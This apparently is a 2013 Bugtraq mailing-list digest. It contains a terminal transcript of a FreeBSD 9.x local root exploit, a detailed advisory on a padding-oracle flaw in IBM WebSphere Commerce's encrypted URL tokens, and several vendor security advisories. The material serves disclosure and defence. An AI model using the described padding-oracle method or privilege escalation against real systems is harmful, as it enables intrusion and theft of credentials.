gmane.comp.security.bugtraq

Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)

Hunger — 2013-06-19T21:32:59

$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
root< at >farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger <fbsd9lul< at >hunger.hu>
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#

[CVE-2013-0523] IBM WebSphere Commerce: Encrypted URL Parameter Vulnerable to Padding Oracle Attacks

VSR Advisories — 2013-06-19T17:30:49

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


                         VSR Security Advisory
                       http://www.vsecurity.com/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Advisory Name: Encrypted URL Parameter Vulnerable to Padding Oracle Attacks
 Release Date: 2013-06-19
  Application: IBM WebSphere Commerce
     Versions: 5.6.X, 6.0.X, 7.0.X, possibly others
       Credit: Timothy D. Morgan <tmorgan (a) vsecurity . com>
               George D. Gal <ggal (a) vsecurity . com>
Vendor Status: Patch Available by Request [5]
CVE Candidate: CVE-2013-0523
    Reference: http://www.vsecurity.com/resources/advisory/20130619-1/

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Product Description
~-----------------~
- From [1]:

"E-commerce is no longer simply about selling online, it's about delivering a
 consistent shopping experience across all customer touchpoints, including
 mobile, social and in-store. WebSphere Commerce allows you to deliver a
 seamless, cross-channel shopping experience through contextually relevant
 content, marketing and promotions, while extending your brand across all
 digital and physical customer touchpoints."


Vulnerability Overview
~--------------------~
In February 2013, VSR identified a vulnerability in the IBM WebSphere Commerce
framework which could allow an attacker to tamper with values stored in the
"krypto" URL parameter.  This parameter is encrypted with a block cipher without
any independent integrity protection.  This, combined with observed application
behavior, allows for padding oracle attacks which can be used to decrypt the
krypto token and forge new tokens with arbitrary embedded parameters.

Additionally, in various deployment scenarios these tokens are commonly sent to
third-party sites such as IBM Coremetrics, but may also be indirectly leaked to
third-party e-commerce partners or content acceleration providers such as Akamai
Edgesuite, etc.  Sensitive data, including user passwords and personally
identifiable information could be compromised in this process.  In addition,
modification of token plaintext could allow for a variety of
application-specific attacks, including injections and/or authorization
bypasses.


Product Background
~----------------~
IBM WebSphere Commerce is an extensive e-commerce framework implemented as a
J2EE application.  The framework passes some state information related to user
sessions inside a "krypto" URL parameter.  This parameter is encrypted using
triple-DES in CBC mode.  The plaintext of this encrypted token contains a set
of name-value pairs which are formatted as URL parameters.  The values stored
in this token can be configured by developers and administrators, meaning
this will likely vary from one deployment to another.  More information on
this parameter can be found in [2].


Vulnerability Details
~-------------------~
During preliminary analysis of krypto token values, VSR first collected several
samples of tokens from different pages in a given application and then used the
Bletchley tool set [3] to analyze the tokens in a black box manner.  The
following is a partial transcript of using bletchley-analyze:

tmorgan< at >mallory:/tmp$ cat krypto-samples.txt
I6fnyg3itBEDqqEXA4iVh6pWX%2F1sV8cK%2F5EnIc4o7CO97FsqvYek69S6AeVC3AUNz1gPfhyFrOKW%0AOPRmUET6%2FI%2F9PmU8n3uqnVrCtwYc4mfA8H6P40AejGHeSc4i0JpQM%2B8iSOj8G9Yp09q%2BeuIiqbuT%0Af2zPnMoCn%2FnePOgwdxm1RwOxV0sr%2Btt98dq2dvliMgCeSGUh5NN5mlMTzabDjPz8MyevH%2BN4kv1h%0AAb%2FrasI8FYHpUwQvk%2BwXz56ORc4WvHLjZOChYTg2xmkiz9c1cHRizvcRTSiAZhtYr2bJlm0%3D
I6fnyg3itBEDqqEXA4iVh8EA%2BplSfftJ%2FiI7fedFhotK2UQO6R5GrtcU%2FTBgrikkzJnc4aGbRJBJ%0ACYhQPdJ30jywWbF7bhagi7sCp7gY3AYGmKguu4T9WZFOGQInC1SZZ7Bd5te42htqd2zwvGK4JwML%0AGPAFpvkRiVJ942TZjY7oiOMoPLn6m11fh%2BzJ6EIf5rJA4OLEs%2FvCyOGYAf%2BIsK1lZos6lhRm
CQ2t4AN6010sy2%2F%2Bu9qQNHX8Qp6yRJFze5o6la5k7qfUjXL%2BY8lWvGx5%2BdZKVmwU4N%2F020srhSN1%0A%2BLboqUj7qWg0DssiH1MZO1ZNxZ0lnrlXc7%2B6jfUOlSnoPiNKVwPaig%2FmKyU376c%3D
CQ2t4AN6010sy2%2F%2Bu9qQNHX8Qp6yRJFze5o6la5k7qeHDyGuXbwAJYvXlwM7yoEnWLXpyh%2BKP2qY%0AoCW66GPT4T1OCLehYCwMyvICI2PQ%2FgoVt81WF29eINhC0QwIbg5p

tmorgan< at >mallory:/tmp$ bletchley-analyze krypto-samples.txt
...
Beginning analysis after decoding by chain:
percent/upper-plus,base64/rfc3548-newline
Unique Lengths: 96,104,168,224
Maximum Possible Block Size: 8
Matching Common Block Sizes: 8
Possible Encodings:
Best Encoding: None
First 4 Values:
0000: 23a7e7ca0de2b411 03aaa11703889587 aa565ffd6c57c70a ff912721ce28ec23 |
"#\xa7\xe7\xca\r\xe2\xb4\x11\x03\xaa\xa1\x17\x03\x88\x95\x87\xaaV_\xfdlW\xc7\n\xff\x91'!\xce(\xec#"
0040: bdec5b2abd87a4eb d4ba01e542dc050d cf580f7e1c85ace2 9638f4665044fafc |
'\xbd\xec[*\xbd\x87\xa4\xeb\xd4\xba\x01\xe5B\xdc\x05\r\xcfX\x0f~\x1c\x85\xac\xe2\x968\xf4fPD\xfa\xfc'
0080: 8ffd3e653c9f7baa 9d5ac2b7061ce267 c0f07e8fe3401e8c 61de49ce22d09a50 |
'\x8f\xfd>e<\x9f{\xaa\x9dZ\xc2\xb7\x06\x1c\xe2g\xc0\xf0~\x8f\xe3< at >\x1e\x8ca\xdeI\xce"\xd0\x9aP'
00C0: 33ef2248e8fc1bd6 29d3dabe7ae222a9 bb937f6ccf9cca02 9ff9de3ce8307719 |
'3\xef"H\xe8\xfc\x1b\xd6)\xd3\xda\xbez\xe2"\xa9\xbb\x93\x7fl\xcf\x9c\xca\x02\x9f\xf9\xde<\xe80w\x19'
0100: b54703b1574b2bfa db7df1dab676f962 32009e486521e4d3 799a5313cda6c38c |
'\xb5G\x03\xb1WK+\xfa\xdb}\xf1\xda\xb6v\xf9b2\x00\x9eHe!\xe4\xd3y\x9aS\x13\xcd\xa6\xc3\x8c'
0140: fcfc3327af1fe378 92fd6101bfeb6ac2 3c1581e953042f93 ec17cf9e8e45ce16 |
"\xfc\xfc3'\xaf\x1f\xe3x\x92\xfda\x01\xbf\xebj\xc2<\x15\x81\xe9S\x04/\x93\xec\x17\xcf\x9e\x8eE\xce\x16"
0180: bc72e364e0a16138 36c66922cfd73570 7462cef7114d2880 661b58af66c9966d |
'\xbcr\xe3d\xe0\xa1a86\xc6i"\xcf\xd75ptb\xce\xf7\x11M(\x80f\x1bX\xaff\xc9\x96m'

0000: 23a7e7ca0de2b411 03aaa11703889587 c100fa99527dfb49 fe223b7de745868b |
'#\xa7\xe7\xca\r\xe2\xb4\x11\x03\xaa\xa1\x17\x03\x88\x95\x87\xc1\x00\xfa\x99R}\xfbI\xfe";}\xe7E\x86\x8b'
0040: 4ad9440ee91e46ae d714fd3060ae2924 cc99dce1a19b4490 490988503dd277d2 |
'J\xd9D\x0e\xe9\x1eF\xae\xd7\x14\xfd0`\xae)$\xcc\x99\xdc\xe1\xa1\x9bD\x90I\t\x88P=\xd2w\xd2'
0080: 3cb059b17b6e16a0 8bbb02a7b818dc06 0698a82ebb84fd59 914e1902270b5499 |
"<\xb0Y\xb1{n\x16\xa0\x8b\xbb\x02\xa7\xb8\x18\xdc\x06\x06\x98\xa8.\xbb\x84\xfdY\x91N\x19\x02'\x0bT\x99"
00C0: 67b05de6d7b8da1b 6a776cf0bc62b827 030b18f005a6f911 89527de364d98d8e |
"g\xb0]\xe6\xd7\xb8\xda\x1bjwl\xf0\xbcb\xb8'\x03\x0b\x18\xf0\x05\xa6\xf9\x11\x89R}\xe3d\xd9\x8d\x8e"
0100: e888e3283cb9fa9b 5d5f87ecc9e8421f e6b240e0e2c4b3fb c2c8e19801ff88b0 |
'\xe8\x88\xe3(<\xb9\xfa\x9b]_\x87\xec\xc9\xe8B\x1f\xe6\xb2< at >\xe0\xe2\xc4\xb3\xfb\xc2\xc8\xe1\x98\x01\xff\x88\xb0'
0140: ad65668b3a961466                                                    |
'\xadef\x8b:\x96\x14f'

0000: 090dade0037ad35d 2ccb6ffebbda9034 75fc429eb2449173 7b9a3a95ae64eea7 |
'\t\r\xad\xe0\x03z\xd3],\xcbo\xfe\xbb\xda\x904u\xfcB\x9e\xb2D\x91s{\x9a:\x95\xaed\xee\xa7'
0040: d48d72fe63c956bc 6c79f9d64a566c14 e0dff4db4b2b8523 75f8b6e8a948fba9 |
'\xd4\x8dr\xfec\xc9V\xbcly\xf9\xd6JVl\x14\xe0\xdf\xf4\xdbK+\x85#u\xf8\xb6\xe8\xa9H\xfb\xa9'
0080: 68340ecb221f5319 3b564dc59d259eb9 5773bfba8df50e95 29e83e234a5703da |
'h4\x0e\xcb"\x1fS\x19;VM\xc5\x9d%\x9e\xb9Ws\xbf\xba\x8d\xf5\x0e\x95)\xe8>#JW\x03\xda'
00C0: 8a0fe62b2537efa7                                                    |
'\x8a\x0f\xe6+%7\xef\xa7'

0000: 090dade0037ad35d 2ccb6ffebbda9034 75fc429eb2449173 7b9a3a95ae64eea7 |
'\t\r\xad\xe0\x03z\xd3],\xcbo\xfe\xbb\xda\x904u\xfcB\x9e\xb2D\x91s{\x9a:\x95\xaed\xee\xa7'
0040: 870f21ae5dbc0025 8bd797033bca8127 58b5e9ca1f8a3f6a 98a025bae863d3e1 |
"\x87\x0f!\xae]\xbc\x00%\x8b\xd7\x97\x03;\xca\x81'X\xb5\xe9\xca\x1f\x8a?j\x98\xa0%\xba\xe8c\xd3\xe1"
0080: 3d4e08b7a1602c0c caf2022363d0fe0a 15b7cd56176f5e20 d842d10c086e0e69 |
'=N\x08\xb7\xa1`,\x0c\xca\xf2\x02#c\xd0\xfe\n\x15\xb7\xcdV\x17o^
\xd8B\xd1\x0c\x08n\x0ei'


These 4 samples have decoded lengths which are consistent with a 64-bit
(8 byte) block cipher (such as DES, 3DES, or blowfish).  In addition, the
first two samples share the first two blocks in common (but no others),
while the third and fourth samples have the first four blocks in common.
This pattern is a sign that the ciphertext may be encrypted using CBC mode
with a static IV, which is a very common implementation mistake.  Use of
a static IV can allow for information leaks, and while it is typically not
a critical flaw in this context, it does provide an indication that CBC
mode encryption may be in use.

- From there, IBM fix packs were obtained for WebSphere Commerce and the relevant
classes were decompiled.  Analysis of the decryption process revealed that the
received krypto token is first base64 decoded, then decrypted, and finally
decoded from UTF-8 (all prior to interpretation as a set of name-value pairs).
In most cases, if an error occurs during these first few steps, the decryption
routine returns a null value, which is interpreted by the application as if the
krypto parameter were never provided by the user.  However, if execution
arrives at the UTF-8 decoding step and an error occurs in the interpretation
of UTF-8 code points, the method uses System.exit() to end the process.
In practice, this exit condition causes the server to return an HTTP response
with a zero-length body.  This difference in behavior can be utilized to
create a "padding oracle", which allows one to determine if a given
ciphertext's padding (after decryption) is correct.  Given that the
encryption mode is CBC, this makes the application vulnerable to padding
oracle attacks which are discussed further in [4].  (Note that this is not
the only way in which a padding oracle can be constructed based on
application behavior, but merely the most reliable known method.)

A script was developed using Bletchley's POA class to validate that this flaw
exists in a real-world deployment. Encrypted tokens were successfully decrypted.
In some cases, sensitive information (including a user password) was observed
to exist in the recovered plaintext.

Note that it would also be possible to craft malicious krypto token values that
specify nearly arbitrary plaintext name/value pairs after decryption.  The
implementation of this attack would be somewhat tricky, given the static nature
of the initialization vector, but the plaintext format of the krypto tokens is
fairly forgiving, which would allow an attacker to work around this limitation.



Versions Affected
~---------------~
VSR confirmed that WebSphere Commerce versions 5.6.X and 6.X are vulnerable.
IBM indicates the following specific versions are affected:

* WebSphere Commerce versions 7.0.0.0 to 7.0.0.7
* WebSphere Commerce versions 6.0.0.0 to 6.0.0.11
* WebSphere Commerce 5.6.1.0 to 5.6.1.5
* Earlier out of support versions may be affected


Vendor Response
~-------------~
The following timeline details IBM's response to the reported issue:

2013-02-14    IBM was provided a draft security advisory with recommendations
              for remediation.

2013-02-15    IBM acknowledged receipt of advisory.

2013-02-25    IBM acknowledged the vulnerability exists.

2013-03-20    IBM obtained a CVE identifier and estimated patch availability in
              mid-June.

2013-06-04    VSR requested an update for the patch release.  IBM indicated it
              was still expected for mid-June.

2013-06-13    IBM indicated a fix would be released the following day and would
              notify VSR upon release.

2013-06-14    IBM released an advisory [5].

2013-06-15    IBM notified VSR that the advisory was made available.

2013-06-19    VSR advisory released



Technical Recommendations Provided to IBM
~---------------------------------------~
IBM should update the WebSphere Commerce implementation to add a message
authentication code (MAC) to the existing krypto token.  This MAC should be
applied to the full ciphertext of the parameter and verified before any
decryption is attempted.  In addition, the initialization vector (IV) of the
encrypted data should be randomized to prevent information leaks.  Ensure the IV
is included along with the ciphertext in the token and that the MAC is applied
to this value along with the ciphertext.  For instance, a safer implementation
might read (in pseudocode):

  iv = get_random_bytes(8)
  ciphertext = encrypt(cipher_key, iv, plaintext)
  integrity = mac(mac_key, iv + ciphertext)
  krypto = base64(iv + ciphertext + mac)

Once again, the mac should be verified prior to any decryption operation.



Recommendation for Users
~----------------------~
Apply the security update released by IBM as soon as possible.  The following
instructions are provided in [5]:

"For supported versions, open a Problem Management Record (PMR) with IBM
WebSphere Commerce Support to request an Interim Fix for APAR JR46386 and
include your WebSphere Commerce version including Fix Pack level. For out of
support versions, we recommend that you upgrade to a supported version."



Common Vulnerabilities and Exposures (CVE) Information
~----------------------------------------------------~
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2013-0523 to this issue.  This is a candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


References:

1.  http://www.ibm.com/software/products/us/en/websphere-commerce

2.
http://pic.dhe.ibm.com/infocenter/wchelp/v6r0m0/index.jsp?topic=%2Fcom.ibm.commerce.admin.doc%2Ftasks%2Ftdc_encryparam.htm

3.  http://code.google.com/p/bletchley/

4.  http://www.skullsecurity.org/blog/2013/padding-oracle-attacks-in-depth

5.  http://www-01.ibm.com/support/docview.wss?uid=swg21640597


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

This advisory is distributed for educational purposes only with the sincere
hope that it will help promote public safety.  This advisory comes with
absolutely NO WARRANTY; not even the implied warranty of merchantability or
fitness for a particular purpose.  Neither Virtual Security Research, LLC nor
the author accepts any liability for any direct, indirect, or consequential
loss or damage arising from use of, or reliance on, this information.

See the VSR disclosure policy for more information on our responsible
disclosure practices:
  http://www.vsecurity.com/company/disclosure

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
     Copyright 2013 Virtual Security Research, LLC.  All rights reserved.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQIVAwUBUcHqyNaINF9fnpkCAQJfPhAAoiLqc/3grGNAyZCnNOtdnOu1nw7GUXil
d1NbwhPc6XTB8l1+aXhx1cymdz6fzzG1NUOduGjDrNfBVlzMRk9Ohsx2QVQZF2V5
SOlblGYIyB/Tl0yVz5+cvqzCEB/7/2l8BTvU4nVAb93n1JYaH0epcTAbHy3Y4cAP
Uanua9i8QEj/Y64elIqcTJcfJ18MmVxDO7BFcgdc8e/3GJNq4ikvVB2OIDougm9Q
keej/hVfkOyQqA65qYFJ5f1BOQ9yU3rqBYceMdjeM0c4FCisCPjbarEEHXnwv1yf
5RLkAF9uz6+sljBiNSjiocsrrYgcXIQtMjFHYLVMXq/37zBZONk9CWvrIeXWTe+6
Do154+haTEXQDTUKIcrqPPxTu+cbNsneKfk1XOn4vz6fnsyeVVwYiXvBUXw/gd7p
PJ2IgBZSfQaMfA58X7q5DyqSaUH1EKbzDoeSMW6iZQuEyHam9MUkL7AfJDiKbXb4
gjb3oeU7yEv37nPdMM6yYlj3OMwFK9ieakuM5owVYfQIMiXr6KLrC0o4aJwQk0fZ
CRtZn/XAEtK2tRhNG/L1LfytBWQDeZeUtoqGJrfZEAQh7DLQLe0QKHNXaI70QYE2
RFZhLxARw99x+Yhotk4lQieGOPIA4lzY8r9kA+hOc7HWoLdJCdbjXoxhCG17XJmX
Uco18m9gQY8=
=egUe
-----END PGP SIGNATURE-----

[SECURITY] [DSA 2711-1] haproxy security update

Moritz Muehlenhoff — 2013-06-19T17:11:58

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2711-1                   security< at >debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
June 19, 2013                          http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : haproxy
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-2942 CVE-2013-1912 CVE-2013-2175

Multiple security issues have been found in HAProxy, a load-balancing 
reverse proxy:

CVE-2012-2942

    Buffer overflow in the header capture code.

CVE-2013-1912

    Buffer overflow in the HTTP keepalive code.

CVE-2013-2175

    Denial of service in parsing HTTP headers.

For the oldstable distribution (squeeze), these problems have been fixed in
version 1.4.8-1+squeeze1.

The stable distribution (wheezy) doesn't contain haproxy.

For the unstable distribution (sid), these problems have been fixed in
version 1.4.24-1.

We recommend that you upgrade your haproxy packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-announce< at >lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlHB5iUACgkQXm3vHE4uyloejQCcDLeGSbq/TcynokkvYSZf7tgW
ykUAn2IzWLERPgLLKGWdtiazkMZ1hAJh
=fAae
-----END PGP SIGNATURE-----

Cisco Security Advisory: Multiple Vulnerabilities in Cisco TelePresence TC and TE Software

Cisco Systems Product Security Incident Response Team — 2013-06-19T16:00:14

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Cisco Security Advisory: Multiple Vulnerabilities in Cisco TelePresence TC and TE Software

Advisory ID: cisco-sa-20130619-tpc

Revision 1.0

For Public Release 2013 June 19 16:00  UTC (GMT)

+---------------------------------------------------------------------

Summary
=======

Cisco TelePresence TC and TE Software contain two vulnerabilities in the implementation of the Session Initiation Protocol (SIP) that could allow an unauthenticated remote attacker to cause a denial of service (DoS) condition.

Additionally, Cisco TelePresence TC Software contain an adjacent root access vulnerability that could allow an attacker on the same physical or logical Layer-2 network as the affected system to gain an unauthenticated root shell.

Cisco has released free software updates that address these vulnerabilities. Workarounds that mitigate the Cisco TelePresence TC and TE Software SIP Denial of Service vulnerabilities are available. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130619-tpc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.18 (Darwin)

iF4EAREKAAYFAlHBtlQACgkQUddfH3/BbTpOdwEAiBS9DSSPEUee26GiAHsj2UbF
ts/iwI6PsKqrsZ8PWzsA/iY2dCpNgpMvtw7uCT6oUu6jj6DumUhebUKjh2TkotFO
=4gGi
-----END PGP SIGNATURE-----

Facebook critical design flaw

2013-06-19T14:45:38

On or around September 27, 2012 I disclosed to Facebook through https://www.facebook.com/whitehat/report/ a critical design flaw in how users share photos using a URI. Once a URI is known the only action the user can take to hide the contents of a photo album is to delete the album. This means if you ever have a breach, be it someone sitting in front of your computer, or getting your Facebook password, you must delete all your photo albums to keep the contents private. You can succumb to the fact that those photos are breached, and only place photos in new albums as well.

Please note the following:
1) I don't care about the bounty, I would just like to see this fixed.
2) From initial disclosure to initial contact from Facebook took 13 days. Far longer than the same day fix for a previous issue I disclosed to Facebook.

Recommended fix:

1) Provide the user a way to regenerate this URI with a link: "Expire this URI"
2) Provide (or force) it as an option when changing their password
3) When Facebook believes an account has been accessed by someone else (there's a dialog for this) provide (or force) an option to change this URI

Emails from Facebook about this:

--snip--
10/09/12

Hi Joel,

Ack - it appears the external response got dropped (we're investigating what happened there). Incredibly sorry about the delay. We're actively working on this now to confirm if this is intentional behavior.

Thanks,

Alex
Security
Facebook

--------

--snip--
10/10/12

Hey Joel,

As you expected, the investigation here indeed revealed that this was "intentional" in the sense that it has always operated this way. The URIs generated by this feature were designed to be public and permanent. Our Photos team is currently collecting additional data on the usage of this feature to determine next steps as there are a few different options available. For your reference, we're tracking this as a security enhancement rather than a high-pri bug, which means we're likely looking at a resolution time of a several weeks. I'll keep you updated as the team reaches a decision on next steps.

Thanks,

Alex
Security
Facebook
--------

--snip--
10/29/12

Hi Joel,

The Photos team has decided that an option to invalidate existing links is ideal experience here. An engineer will begin building out the functionality shortly. Will keep you updated as time estimates solidify.

Thanks,

Alex
Security
Facebook

--------

--snip--
06/14/2013

Hi,

No that was separate, we have an engineer working on this fix but it is part of a larger rewrite so it is taking longer.

Thanks,

Emrakul
Security
Facebook
--------

Remote code execution in Puppet

2013-06-19T08:30:53

http://puppetlabs.com/security/cve/cve-2013-3567/

ESA-2013-032 RSA BSAFE® Micro Edition Suite Security Update for SSL/TLS Plaintext Recovery (aka “Lucky Thirteen”) Vulnerability

Security Alert — 2013-06-19T14:49:01

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ESA-2013-032: RSA BSAFE® Micro Edition Suite Security Update for SSL/TLS Plaintext Recovery (aka Lucky Thirteen) Vulnerability

EMC Identifier: ESA-2013-032

CVE Identifier: CVE-2013-0169

Severity Rating: CVSS v2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)

Affected Products:

All versions of RSA BSAFE Micro Edition Suite except for 4.0.3 and 3.2.5

Unaffected Products:

RSA BSAFE Micro Edition Suite 4.0.3 and 3.2.5 (newly released)

Summary:

RSA BSAFE Micro Edition Suite 4.0.3 and 3.2.5 contain updates designed to prevent SSL/TLS Plaintext Recovery (aka Lucky Thirteen) attacks (CVE-2013-0169).

Details:

Researchers have discovered a weakness in the handling of CBC cipher suites in SSL, TLS and DTLS. The Lucky Thirteen attack exploits timing differences arising during MAC processing. Vulnerable implementations do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue.

Details of this attack can be found at: http://www.isg.rhul.ac.uk/tls/TLStiming.pdf

Recommendation:

RSA BSAFE Micro Edition Suite 4.0.3 and 3.2.5 contain a patch that is designed to help ensure that MAC checking is time invariant in servers.

RSA recommends that customers on RSA BSAFE Micro Edition Suite 3.2.x or lower upgrade to RSA BSAFE Micro Edition Suite 3.2.5. RSA recommends that customers on RSA BSAFE Micro Edition Suite 4.0.x upgrade to RSA BSAFE Micro Edition Suite 4.0.3.

Customers can also protect against the attack by disabling CBC mode cipher suites on clients and servers. Cipher suites that use RC4 and, if TLS 1.2 is available, AES-GCM can be used.

Obtaining Downloads

To request your upgrade of the software, please call your local support telephone number (contact phone numbers are available at http://www.rsa.com/node.aspx?id=1356 ) for most expedient service. You may also request your software upgrade online at http://www.rsa.com/go/form_ins.asp .

Obtaining Documentation:

To obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link.

Severity Rating:

For an explanation of Severity Ratings, refer to the Knowledge Base Article, Security Advisories Severity Rating at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.

Obtaining More Information:

For more information about RSA products, visit the RSA web site at http://www.rsa.com.

Getting Support and Service:

For customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help & Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab.

General Customer Support Information:

http://www.rsa.com/node.aspx?id=1264

RSA SecurCare Online:

https://knowledge.rsasecurity.com

EOPS Policy:

RSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details.
http://www.rsa.com/node.aspx?id=2575

SecurCare Online Security Advisories

RSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. RSA disclaim all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

About RSA SecurCare Notes & Security Advisories Subscription

RSA SecurCare Notes & Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If youd like to stop receiving RSA SecurCare Notes & Security Advisories, or if youd like to change which RSA product family Notes & Security Advisories you currently receive, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the instructions on the page, remove the check mark next to the RSA product family whose Notes & Security Advisories you no longer want to receive. Click the Submit button to save your selection.

Sincerely,

RSA Customer Support

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (Cygwin)

iEYEARECAAYFAlHBw08ACgkQtjd2rKp+ALyHQACggG2us3gMSQQX4Ol0+Zxrqjvi
QAsAoLKL5rrl9BDb54SQ0i7K57mGy9S/
=JcQv
-----END PGP SIGNATURE-----

ESA-2013-039: RSA BSAFE® SSL-J Multiple Vulnerabilities

Security Alert — 2013-06-19T14:50:14

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ESA-2013-039: RSA BSAFE® SSL-J Multiple Vulnerabilities

EMC Identifier: ESA-2013-039

CVE Identifier: CVE-2011-3389, CVE-2013-0169

Severity Rating: CVSS v2 Base Score: Refer NVD (http://nvd.nist.gov/) for individual scores for each CVE

Affected Products:

All versions of RSA BSAFE SSL-J except for 6.0.1 and 5.1.2

Unaffected Products:

RSA BSAFE SSL-J 6.0.1 and 5.1.2 (newly released)

Summary:

RSA BSAFE SSL-J 6.0.1 and 5.1.2 contain updates designed to prevent BEAST attacks (CVE-2011-3389) and SSL/TLS Plaintext Recovery (aka Lucky Thirteen) attacks (CVE-2013-0169).

Details:

BEAST

There is a known vulnerability in SSLv3 and TLS v1.0 to do with how the Initialization Vector (IV) is generated. For symmetric key algorithms in CBC mode, the IV for the first record is generated using keys and secrets set during the SSL or TLS handshake. All subsequent records are encrypted using the ciphertext block from the previous record as the IV. With symmetric key encryption in CBC mode, plain text encrypted with the same IV and key generates the same cipher text, which is why having a variable IV is important.

The BEAST exploit uses this SSLv3 and TLS v1.0 vulnerability by allowing an attacker to observe the last ciphertext block, which is the IV, then replace this with an IV of their choice, inject some of their own plain text data, and when this new IV is used to encrypt the data, the attacker can guess the plain text data one byte at a time.

Lucky Thirteen

Details of this attack can be found at: http://www.isg.rhul.ac.uk/tls/TLStiming.pdf

Recommendation:

RSA recommends that customers on RSA BSAFE SSL-J 5.1.x or lower upgrade to RSA BSAFE SSL-J 5.1.2. RSA recommends that customers on RSA BSAFE SSL-J 6.0 upgrade to RSA BSAFE SSL-J 6.0.1.

To address BEAST, RSA introduce a new feature called first block splitting to RSA BSAFE SSL-J 6.0.1 and 5.1.2. First block splitting is designed to prevent the BEAST exploit by introducing unknown data into the encryption scheme prior to the attackers inserted plain text data. This is done as follows:

1. The first plain text block to be encrypted is split into two blocks. The first block contains the first byte of the data, the second block contains the rest.
2. A MAC is generated from the one byte of data, the MAC key, and an increasing counter. This MAC is included in the first block.
3. The one byte of data, along with the MAC, is encrypted and becomes the IV for the next block. Because the IV is now essentially random data, it is impossible for an attacker to predict it and replace it with one of their own.
For RSA BSAFE SSL-J 6.0.1 and 5.1.2, first block splitting is engineered to be enabled by default for vulnerable cipher suites, making the application secure by default. If required, the application can disable first block splitting by setting the system property jsse.enableCBCProtection:

Using the following Java code:

System.setProperty("jsse.enableCBCProtection", "false");

On the Java command line, passing the following argument:

-Djsse.enableCBCProtection=false

For more information about setting security properties, see section System and Security Properties in the RSA BSAFE SSL-J Developer Guide.

The best way to help prevent the BEAST attack is to use TLS v1.1 or higher. The vulnerability to do with IV generation was fixed in TLS v1.1 (released in 2006) so implementations using only TLS v1.1 or v1.2 are engineered to be secure against the BEAST exploit. However, support for these higher level protocols is limited to a smaller number of applications, so supporting only TLS v1.1 or v1.2 might cause interoperability issues.

A second solution is to limit the negotiated cipher suites to exclude those that do not require symmetric key algorithms in CBC mode. However, this substantially restricts the number of cipher suites that can be negotiated. That is, only cipher suites with NULL encryption or cipher suites with streaming encryption algorithms (the RC4 algorithm) could be negotiated, which might result in reduced security.

